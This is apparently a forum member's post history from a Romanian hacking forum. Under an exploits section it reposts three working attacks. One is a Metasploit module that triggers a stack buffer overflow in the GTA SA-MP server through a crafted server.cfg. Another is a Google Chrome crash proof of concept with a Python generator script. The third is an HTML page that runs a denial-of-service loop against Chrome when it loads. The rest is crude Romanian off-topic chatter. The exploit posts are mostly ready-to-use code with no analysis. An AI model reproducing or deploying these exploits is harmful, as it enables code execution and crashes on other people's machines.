Jump to content

LLegoLLaS

Active Members
 View Profile  See their activity

  • Posts

    2060

  • Joined

  • Last visited

  • Days Won

    11

 Content Type 

Posts posted by LLegoLLaS

  1. GTA SA-MP server.cfg Buffer Overflow

    in Exploituri

    Posted 

    ##
    # $Id: gta_samp.rb 14076 2011-10-26 22:16:26Z mc $
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

    include Msf::Exploit::FILEFORMAT

    def initialize(info = {})
    super(update_info(info,
    'Name' => 'GTA SA-MP server.cfg Buffer Overflow',
    'Description' => %q{
    This module exploits a stack-based buffer overflow in GTA SA-MP Server.
    This buffer overflow occurs when the application attempts to open a malformed
    server.cfg file. To exploit this vulnerability, an attacker must send the
    victim a server.cfg file and have them run samp-server.exe.
    },
    'License' => MSF_LICENSE,
    'Author' =>
    [
    'Silent_Dream', # Original discovery, MSF Module, template by mona.py
    ],
    'Version' => '$Revision: 14076 $',
    'References' =>
    [
    [ 'URL', 'http://www.exploit-db.com/exploits/17893' ]
    ],
    'DefaultOptions' =>
    {
    'EXITFUNC' => 'process',
    },
    'Platform' => 'win',
    'Payload' =>
    {
    'BadChars' => "\x0d\x0a\x1a",
    'Space' => 392,
    'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
    'DisableNops' => true,
    'MaxSize' => 392,
    },

    'Targets' =>
    [
    [
    'GTA SA-MP (samp-server) v0.3.1.1',
    {
    'Ret' => 0x00429faa, # PUSH ESP; RET (samp-server.exe)
    }
    ],
    ],
    'Privileged' => false,
    'DisclosureDate' => 'Sep 18 2011',
    'DefaultTarget' => 0))

    register_options(
    [
    OptString.new('FILENAME', [ false, 'The file name.', 'server.cfg'])
    ], self.class)

    end

    def exploit

    buffer = "echo "
    buffer << rand_text_alpha_upper(379)
    buffer << [target.ret].pack('V')
    buffer << payload.encoded
    file_create(buffer)

    end
    end

    sursa

  9. Bine v-am gasit !

    in Bine ai venit

    Posted · Edited by LLegoLLaS
    3 in pula mea!

    joc si cs :))

    nu am multe sanse la ce ? ;))

    fail in plm =)))

    ps: scoate dracu sorcova aia de la semnatura...imi crapa retina (imaginea poti s-o lasi[desi ti-a iesit nasol rau, layere puse aiurea etc]da' nu mi scrie toate idioteniile)

    sorry de off

  12. Google Chrome PoC, killing thread

    in Exploituri

    Posted

    ## _ (`-') _ pigtail23 (`-') (`-') _ _ remoteshell.de ##

    ## \-.(OO ) (_) .-> ( OO).-> (OO ).-/ (_) <-. ##

    ## _.' \ ,-(`-') ,---(`-')/ '._ / ,---. ,-(`-'),--. ) .----. .----. ##

    ##(_...--'' | ( OO)' .-(OO )|'--...__)| \ /`.\ | ( OO)| (`-')\_,-. |\_.-, | ##

    ##| |_.' | | | )| | .-, \`--. .--''-'|_.' | | | )| |OO ) .' .' |_ < ##

    ##| .___.'(| |_/ | | '.(_/ | | (| .-. |(| |_/(| '__ | .' /_ .-. \ | ##

    ##| | | |'->| '-' | | | | | | | | |'->| |'| |\ `-' / ##

    ##`--' `--' `-----' `--' `--' `--' `--' `-----' `------' `---'' ##

    ###################################################################################

    ###################################################################################

    October 22, 2011

    Ohh nice! What u doing google? Thx 4 ur bug! 0__o

    Google Chrome PoC, killing thread. Exploitable or only a DOS!? Found no way to exploit it. Good Luck!!!

    Testsystem: WinXP SP3, Win7(64 bit)

    Google Chrome version: 14.0.835.202

    Greetings to:

    mr_insecure, myownremote, noptrix, Eph, lnxg33k, CyberMaN,...

    TheXero, Dexter, #back-track.de and #intern0t @ irc.freenode.net

    ###################################################################################

    poc.html:

    too big!

    ###################################################################################

    Python script for debugging:

    #!/usr/bin/python

    filename = 'poc.html'
    content = open('template.html', 'r').read()

    buff = '$$*' * 36800

    rc = 484
    content2 = content[:rc] + buff + content[rc:]

    FILE = open(filename,"w")
    FILE.write(content2)
    FILE.close()

    template.html:

    <html>
    <body>
    <script>(function(){var d=document;if(!("autofocus" in d.createElement("input"))){try{d.getElementById("yschsp").focus();}catch(e){}}data={"assist":{"url":"http:\/\/www.google.com","maxLength":38,"linkStem":"http:\/\/www.remoteshell.de","settingsUrl":"http:\/\/www.chrooome.xxx","strings":{"searchbox_title":"bam","settings_text":"bam","gossip_desc":"bam","scroll_up":"bam","scroll_down":"bam","aria_available_suggestions":"bam","aria_no_suggestion_available":"bam"}}};window.onload=function(){var h=d.getElementsByTagName("head")[0],o=d.createElement("script");o.src="http://www.0__o";h.appendChild(o);};}());</script>
    </body>
    </html>

    sursa

  13. Google Chrome Denial Of Service (DoS)

    in Exploituri

    Posted

    /*

    GGGGGG\

    GG __GG\

    GG / \__| aaaaaa\ rrrrrr\ aaaaaa\ gggggg\ eeeeee\

    GG |GGGG\ \____aa\ rr __rr\ \____aa\ gg __gg\ ee __ee\

    GG |\_GG | aaaaaaa |rr | \__|aaaaaaa |gg / gg |eeeeeeee |

    GG | GG |aa __aa |rr | aa __aa |gg | gg |ee ____|

    \GGGGGG |\aaaaaaa |rr | \aaaaaaa |\ggggggg |\eeeeeee\

    \______/ \_______|\__| \_______| \____gg | \_______|

    gg\ gg |

    gggggg |

    Info-sec forum: Garage4hackers Forums - Home

    [+] Google Chrome Denial Of Service (DoS)

    [+] Author: Prashant a.k.a t3rm!n4t0r

    [+] C0ntact: happyterminator@gmail.com

    [+] Platform: Windows, *nix

    [+] Tested on: Windows Server 2003, XP SP2, Ubuntu 10.04

    [+] Special Greets to: "vinnu" and secfence team

    [+] Greets to: fb1h2s, b0nd, Eby, punter,godwin austin, the_empty, RD(Xer0), warrior, abhaythehero,d3c0d3r

    all hackers garage crew :)

    */


    <html>
    <title>Download</title>
    <head>
    <script>
    function Lox()
    {

    var longunistring1 = unescape("%u4141?");
    var longunistring2 = unescape("??");
    var longunistring3 = unescape("??");
    var longunistring4 = unescape("??");

    for(i=0; i <= 100 ; ++i)
    {
    longunistring1+=longunistring1;
    longunistring2+=longunistring2;
    longunistring3+=longunistring3;
    longunistring4+=longunistring4;
    document.write(longunistring1);
    document.write(longunistring2);
    document.write(longunistring3);
    document.write(longunistring4);
    }
    document.write(longunistring1);
    document.write(longunistring2);
    document.write(longunistring3);
    document.write(longunistring4);
    }
    </script>
    </head>
    <body onLoad="Lox()">
    </body>
    </html>
    Copyright 2011 - BugSearch
    About Us - Tell a Friend - Send

    sursa

  22. Atentie : recensamant

    in Off-topic

    Posted

    un chestionar are cateva zeci de intrebari. Teoretic, recenzorul e obligat sa iti puna toate intrebarile alea ca sa isi ia banii. El are un termen limita la care trebuie sa predea situatia. Adica, daca el nu face "inventarul" celor 150 de locuinte ( da, atat are de facut un recenzor) in decursul a 11 zile, nu isi primeste banii. Daca ati scapat doar cu cateva intrebari, sa stiti ca restul intrebarilor sunt completate "din burta" de catre recenzor.

    pai si pe ''foicicile'' alea is astfel de idiotenii? (cauciuc,polistiren)?:|

×
×
  • Create New...